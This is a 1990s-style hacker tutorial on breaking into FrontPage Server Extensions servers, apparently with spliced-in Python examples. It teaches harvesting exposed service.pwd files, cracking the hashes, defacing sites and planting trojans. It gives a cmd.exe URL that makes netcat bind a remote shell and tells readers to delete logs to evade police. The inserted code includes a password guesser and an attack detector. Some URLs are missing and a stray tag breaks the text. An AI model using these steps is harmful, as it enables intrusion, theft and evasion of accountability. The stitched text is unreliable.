
Hacking FrontPage at a Glance

By Aicra from Cekurity In Progress.
Version 2, English.


The second edition of Hacking FrontPage at a Glance is now finished and I hope you will enjoy it. If anything is unclear, please email me. When you have read this paper you should be able to hack a FrontPage server yourself - if not, read it again. I wrote it from my own experience with FPSE (FrontPage Server Extensions), which I think will give you a good understanding of what FPSE really is.
If you have no experience with hacking, do not worry: the text is written in newbie-friendly language.
Have fun!

So what is Microsoft FrontPage Server Extensions?

Officially, FrontPage Server Extensions (FPSE) are a set of server-side programs that sit behind an ordinary web server (IIS on Windows, Apache-style servers on UNIX) and let the FrontPage client publish, edit and administer a "web" over HTTP, on port 80 as you might already know.
FrontPage itself has a nice graphical user interface (GUI), which makes it easy to create web pages in no time.
Unofficially it's a web server with a serious backdoor that lets you hack it very easily - more about that later.
Microsoft acquired Vermeer Technologies Inc. (VTI), the company that wrote FrontPage, along with its programmers; the _vti_ prefix on FrontPage's directories comes from that name. In my opinion VTI did a lousy job. Whether VTI built the backdoor on purpose to make Microsoft products look even worse (go VTI) than they already do, I don't know, but that would sure be a cool thing to do against monopolists!


What you need:

·	The Microsoft FrontPage software with the Server Extensions installed.
·	A password cracking program like John the Ripper by Solar Designer.
·	An Internet connection, of course.
·	Your own nice I've-hacked-this-homepage page to upload.
·	A trojan horse, if you like.


Learn something about the operating systems that FPSE runs on, especially where the log files are, if any. Why?
Imagine the cops knocking at your front door some day just because you didn't know where the log files were.
It hasn't happened to me, even though I'm not always looking for logs, but you can never be too sure.
The operating systems FPSE runs on include UNIX, Windows 95, Windows 98 and Windows NT.
Log files could be a CGI script that counts visitors (and records their IP addresses) coming to the web page, an FTP server keeping track of downloaded files, and so on. Be sure to delete such things!

Hacking FrontPage at a Glance

When you log onto a FrontPage server (FPS) it prompts for a username and a password, a little security feature preventing unauthorised personnel from getting access to the server. The FPS stores the username and password in a file usually called service.pwd. Why do I say usually? Earlier versions of FPSE, version 2.0 and below I think, didn't have a file called service.pwd but three other files called administrators.pwd, authors.pwd and users.pwd. service.pwd resides in a directory called _vti_pvt. (Go ahead and find it on your own computer.)

When you find it, open service.pwd in a text editor like Notepad or Write. You'll probably see something like this*:

	Johndoe:lwCa29nm.xv

*) If you can't find the service.pwd file in the _vti_pvt folder, it's because you haven't created a web in FrontPage yet. Do so before looking for the file!

Anyway, Johndoe is the username and lwCa29nm.xv is the password field. The password has been hashed, so you can't see the real one. The hashing method is the traditional DES-based crypt(3), which John the Ripper calls "standard DES": it is one-way, so nobody "decrypts" it; a cracker hashes guesses with the same salt and compares. A complete standard DES hash is 13 characters long, a 2-character salt followed by 11 characters of hash, and only the first 8 characters of the password are used at all, which is why it is fairly easy to crack with a password cracker like John the Ripper (JtR). In the Software section of my homepage you can download the latest JtR.
So far you know what file to look for, where it resides and what a DES-hashed password file looks like, so now it's time to begin your attack.

·	Launch your Internet connection and go to your favourite search engine, e.g. AltaVista, HotBot or SavvySearch.
·	Type link:service.pwd in the search field at AltaVista and hit the Search button. At HotBot or SavvySearch simply type service.pwd.
·	If you aren't getting any results, try service.pwd without the link: prefix.
At AltaVista, try .pwd (dot pwd), or try administrators.pwd and so on. Be imaginative.
·	If you are unlucky, try url:/_vti_pvt/ or url:_vti_pvt. In my experience this one works about 85 per cent of the time, because that's where the .pwd files reside. If you try to access the /_vti_pvt/ directory itself, your browser may or may not give a response like this:

You are not authorised to view this page
You might not have permission to view this directory or page using the credentials you supplied.

A solution to that little problem could be:

It looks like this:


Change it to this instead:


You will often be able to retrieve the hashed password file that way.
Follow the hyperlinks that the search engines give you and download the password file, or just its plain text, to your hard disk. Remember the URL, e.g. www.microsoft.com, or the IP address, e.g.

When you think you've got enough service.pwd files, break your Internet connection and shut down your browser, because now it's time to crack the passwords.
I recommend that you use John the Ripper since it's fast and easy to use. If you don't know how to use JtR, read the guide shipped with the program. Here's what I normally do when cracking a standard DES password file:

I would start with this command in JtR:

john -single c:\mypasswordfile.pwd	; single crack mode: builds guesses from the username itself (and its variations) and tests them against the hash.

If this command doesn't crack the password (in most cases it won't), I would try a wordlist with some rules (read the texts shipped with JtR for more info) or issue this command:

john -i c:\mypasswordfile.pwd	; incremental mode: tries all character combinations, starting with short guesses and working up through longer ones.

This command is time consuming, but in most cases you'll get your password cracked. Imagine a password like ZZ#S)2:-_!#S<=: (before hashing); that would take a REAL long time to crack - though remember that standard DES only uses the first 8 characters, so only ZZ#S)2:- actually has to be guessed.
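The file layout and the cracking workflow described above, as an added example (Python; this is not code from the paper, from FrontPage or from John the Ripper). It parses a constructed service.pwd, checks that each password field is a complete 13-character standard DES hash, pulls out the 2-character salt, and then guesses the way john does: variations of the username first (single mode), then a wordlist. The usernames and the hash rl.3StKT.4T8M are constructed sample data (the hash is the PHP manual's standard-DES example for "rasmuslerdorf"); the stdlib crypt module supplies crypt(3) and was removed in Python 3.13, so run this on 3.12 or earlier, or hand the parsed entries to john.

```python
"""Parse a FrontPage service.pwd file and guess its standard-DES hashes.

Added example; not code from the paper or from FrontPage. It shows the
.pwd layout the text describes, what a 13-character 'standard DES' hash
consists of, and the two guessing strategies the text uses with John the
Ripper: guesses built from the username (single mode) and a wordlist.
"""
import re
import warnings

try:
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", DeprecationWarning)
        import crypt  # wraps the system crypt(3); removed in Python 3.13
except ImportError:
    crypt = None

# Constructed sample, not a real capture. 'rl.3StKT.4T8M' is the PHP manual's
# standard-DES example, crypt("rasmuslerdorf", "rl"). The Johndoe line is the
# paper's 11-character value, which is too short to be a DES crypt hash.
SAMPLE_SERVICE_PWD = """# -FrontPage-
rasmus:rl.3StKT.4T8M
Johndoe:lwCa29nm.xv
"""

# A full traditional DES crypt hash is 13 characters from [./0-9A-Za-z]:
# a 2-character salt (12 bits, so only 4096 values) followed by 11 hash chars.
DES_HASH_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def parse_service_pwd(text):
    """Return {username: hash_field}, skipping blank and '#' comment lines."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, pw_hash = line.partition(":")
        entries[user] = pw_hash
    return entries


def des_salt(pw_hash):
    """Salt is the first two characters; reject anything that is not DES crypt."""
    if not DES_HASH_RE.match(pw_hash):
        raise ValueError("not a 13-character DES crypt hash: %r" % pw_hash)
    return pw_hash[:2]


def des_crypt_available():
    """True when this Python still ships the crypt module."""
    return crypt is not None


def des_crypt(password, salt):
    """crypt(3) with a 2-char salt = traditional DES; only the first 8 chars count."""
    if crypt is None:
        raise RuntimeError("no crypt module on this Python; run john instead")
    return crypt.crypt(password, salt)


def single_mode_candidates(user):
    """Guesses derived from the login name, in the spirit of 'john -single'."""
    base = user.lower()
    variants = {base, base.capitalize(), base.upper(), base[::-1]}
    for v in list(variants):
        variants.add(v + v)
        variants.update(v + str(n) for n in range(10))
    return variants


def crack(entries, wordlist=()):
    """Username-derived guesses first, then the wordlist; returns {user: password}."""
    found = {}
    for user, pw_hash in entries.items():
        if not DES_HASH_RE.match(pw_hash):
            continue  # malformed or truncated hash: nothing to compare against
        salt = des_salt(pw_hash)
        for guess in list(single_mode_candidates(user)) + list(wordlist):
            if des_crypt(guess, salt) == pw_hash:
                found[user] = guess
                break
    return found


if __name__ == "__main__":
    entries = parse_service_pwd(SAMPLE_SERVICE_PWD)
    for user, h in entries.items():
        kind = "DES crypt, salt %s" % h[:2] if DES_HASH_RE.match(h) else "not a DES hash"
        print("%s: %s (%s)" % (user, h, kind))
    if des_crypt_available():
        print(crack(entries, wordlist=["letmein", "rasmuslerdorf"]))
```

Because traditional DES crypt only looks at the first 8 characters, des_crypt("rasmusle", "rl") produces the same hash as the full word, which is why a long password is no protection here if its first 8 characters are guessable. The paper's own value lwCa29nm.xv is rejected by des_salt as too short to be a DES hash, the kind of check worth running before spending hours in incremental mode.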

Let's say you have cracked the password; you're now able to gain access to the FPS.
·	Launch your own copy of FrontPage (the FrontPage Explorer).
·	Click “Open Web” in the File menu.
·	Type in www.myfrontpagevictim.com or the IP address of the victim's server.
·	Click “OK” and wait...
·	*1) Type in the username and password.
·	Click “OK” and wait...
·	Voila: access granted!
o	You could now upload your own I've-hacked-this-server-homepage.html.
o	Snaffle some other passwords (if any).
o	*2) Upload a trojan horse.
·	Cover your tracks and delete the log file, if any (sometimes there's no log file, but be aware).
·	I advise you not to delete anything on the FrontPage server. Why? I think you can figure that out for yourself. (Only rename the start page on the FPS to something like renamed_index.html.)

*1) It's likely that the FPS won't prompt for a username and password at all. It depends on how the administrator of the server has set up the privileges for users. Read the Windows NT Wardoc by Neonsurge and the Rhino9 Team for more info on NT privileges. (You can find it in the Textware section of my page.)

*2) Whenever you have gained access to the server, you could upload a trojan like Back Orifice. Why Back Orifice? Because it comes in both UNIX and Windows versions (the server part runs on Windows; the UNIX build is the client), and since FPSE can run on both UNIX and Windows it's perfect.
There's an exploit called the binary FTP exploit, but what is it? It's an exploit that allows any hacker/intruder to run a binary file on the FPS, but there is a limitation: you'll have to find a server whose FTP service allows anonymous writes. Then you create a directory called _vti_bin via FTP and upload mytrojan.exe. Then issue this URL in your browser:


Bingo, the server is served.

Quote from The Windows NT Wardoc:

Shortly after the binary attack made its rounds, the _vti_cnf bug was found. This would allow an intruder to view all files in a certain directory. By replacing the index.html with _vti_cnf, the intruder would see all files in that directory, and possibly gain access to them. The attack is issued as follows:

Standard structure http://www.someserver.com/some_directory_structure/index.html
Attack structure   http://www.someserver.com/some_directory_structure/_vti_cnf

Quote end.

If the FPS isn't vulnerable to the binary FTP exploit, what can I do to run arbitrary code on it?
I have tried the following on a server running IIS 4.0 (Internet Information Server 4.0) with Service Pack 3 on an NT 4.0 machine; if it works on other configurations, let me know.

Lets attack:

·	Start up your FrontPage Explorer --> FrontPage --> Open Web.
·	Type in the username and password.
·	Then go to cgi-bin and make sure it has Execute permissions.
·	Upload cmd.exe. cmd.exe only exists on NT machines, so get cmd.exe from a friend if you don't run NT. I recommend you also upload nc.exe (netcat).
·	Then bind cmd.exe to a port with netcat (use ncx.exe to do this).
·	Then upload a trojan (e.g. Back Orifice, NetBus...).
·	Load your web browser and type in the following:


This gives you a directory listing of c:\. You could substitute “c” with “d” if you'd like a directory listing of d:\.


Note: there has to be a d: drive for that one to work.
·	Now continue with this command (if you have uploaded nc.exe):

http://www.myvictim.com/cgi-bin/cmd.exe?%20/c%20[path]\inetpub\wwwroot\cgi-bin\nc.exe -L -p 5445 -e cmd.exe

Note: you could substitute port 5445 with any other port; just make sure the server isn't already using it. For example, if the server is running FTP (in this case port 21) it would be stupid to bind cmd.exe to port 21. I have tried that for fun and it resulted in an error, because the port was already taken.

This makes netcat (nc.exe) bind cmd.exe (the command prompt) to port 5445. What does that mean? It means that you can now telnet to the victim on port 5445 and get a command prompt running as the IIS anonymous account (IUSR_<machinename>), the account the CGI was started under, and do whatever that account is allowed to do on the box. If you want to use Back Orifice instead of telnetting to port 5445, issue the following URL in your browser:

http://www.company.com/cgi-bin/cmd.exe?%20/c%20[path]\inetpub\wwwroot\cgi-bin\boserve.exe
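An added example (Python; not the paper's code and not Microsoft's) for the cgi-bin/cmd.exe procedure above and for the _vti_pvt and _vti_cnf requests earlier in the paper. cgi_command_line shows why the %20/c%20 URLs work: a CGI query string with no "=" in it is treated as a search string, split on "+", URL-decoded and handed to the program as command-line arguments, so the server ends up running cmd.exe /c followed by whatever the URL said. The second half is the check a server admin wants: IIS writes every request to its W3C extended log (by default under %SystemRoot%\system32\LogFiles), and flag_frontpage_attacks picks out .pwd fetches from _vti_pvt, _vti_cnf listings and cmd.exe requests, decoding the command that was run. The log lines are constructed, and c:\inetpub\wwwroot stands in for the paper's [path] placeholder by assumption.

```python
"""Reconstruct the command line behind a cgi-bin/cmd.exe URL and flag the
requests this paper uses in IIS W3C extended log lines.

Added example; not code from the paper or from Microsoft. The log lines are
constructed, and the path c:\\inetpub\\wwwroot is an assumption standing in
for the paper's [path] placeholder.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed: the paper's netcat URL with [path] filled in by assumption.
# Browsers send spaces as %20 or '+'; both forms appear here on purpose.
SAMPLE_NC_URL = (r"http://www.myvictim.com/cgi-bin/cmd.exe"
                 r"?%20/c%20c:\inetpub\wwwroot\cgi-bin\nc.exe+-L+-p+5445+-e+cmd.exe")

# Constructed IIS 4.0 W3C extended log excerpt (field set chosen for the example).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-03-01 00:00:01 10.0.0.5 GET /index.html - 200
1999-03-01 00:00:09 10.0.0.5 GET /_vti_pvt/service.pwd - 200
1999-03-01 00:00:15 10.0.0.5 GET /products/_vti_cnf - 200
1999-03-01 00:00:31 10.0.0.5 GET /cgi-bin/cmd.exe %20/c%20dir%20c:\ 200
1999-03-01 00:00:40 10.0.0.5 GET /cgi-bin/cmd.exe %20/c%20c:\inetpub\wwwroot\cgi-bin\nc.exe+-L+-p+5445+-e+cmd.exe 200
1999-03-01 00:01:02 10.0.0.9 GET /_vti_pvt/users.pwd - 401
"""


def cgi_command_line(url):
    """Arguments a CGI server hands to the executable named in the URL path.

    Per the CGI spec, a query string containing no '=' is a 'search string':
    the server splits it on '+', URL-decodes each word and passes the words
    on the command line. cmd.exe then splits the decoded text on spaces, so
    '%20/c%20dir' ends up as ['/c', 'dir'] (the leading %20 separates the
    arguments from the program name).
    """
    query = urlsplit(url).query
    if "=" in query:
        return []  # name=value queries stay in QUERY_STRING, not on argv
    decoded = " ".join(unquote(word) for word in query.split("+"))
    return decoded.split()


def parse_w3c_log(text):
    """Yield one {field: value} dict per data line, using the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            if fields is None:
                raise ValueError("data line before #Fields header")
            yield dict(zip(fields, line.split(" ")))


PWD_FILE_RE = re.compile(r"/_vti_pvt/[^/]+\.pwd$", re.I)  # service.pwd, users.pwd, ...
CNF_DIR_RE = re.compile(r"/_vti_cnf/?$", re.I)           # the directory listing trick
CMD_EXE_RE = re.compile(r"/cmd\.exe$", re.I)              # an uploaded shell in cgi-bin


def flag_frontpage_attacks(log_text):
    """Return (client ip, rule, detail, status) for each request worth a look.

    Failed attempts (401, 404) are reported too: they show someone probing.
    """
    alerts = []
    for rec in parse_w3c_log(log_text):
        stem, query = rec["cs-uri-stem"], rec["cs-uri-query"]
        ip, status = rec["c-ip"], rec["sc-status"]
        if PWD_FILE_RE.search(stem):
            alerts.append((ip, "password file fetch", stem, status))
        elif CNF_DIR_RE.search(stem):
            alerts.append((ip, "_vti_cnf listing", stem, status))
        elif CMD_EXE_RE.search(stem) and query != "-":
            argv = cgi_command_line("http://x" + stem + "?" + query)
            alerts.append((ip, "cmd.exe via cgi-bin", " ".join(argv), status))
    return alerts


if __name__ == "__main__":
    print(cgi_command_line(SAMPLE_NC_URL))
    for alert in flag_frontpage_attacks(SAMPLE_LOG):
        print("%s %-20s %s -> HTTP %s" % alert)
</test>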

Last words:

This will be the last Hacking FrontPage at a Glance paper I'll do, but if you have corrections, suggestions or questions about this paper, email me and I'll see what I can do. I hope that you have enjoyed it and don't think this paper was a waste of time.
Be sure to read some of the other papers I have written.

Links used in the paper


AltaVista                         www.altavista.com
HotBot                            www.hotbot.com
SavvySearch                       www.savvysearch.com
John the Ripper                   At my homepage, in the Software section.
Ncx.exe/nc.exe/bo                 In the Software section.
Aicra - Cekurity In Progress      aicra@yale.cadet.net
Homepage                          http://cip.subnet.dk


© All rights reserved [Cekurity In Progress].
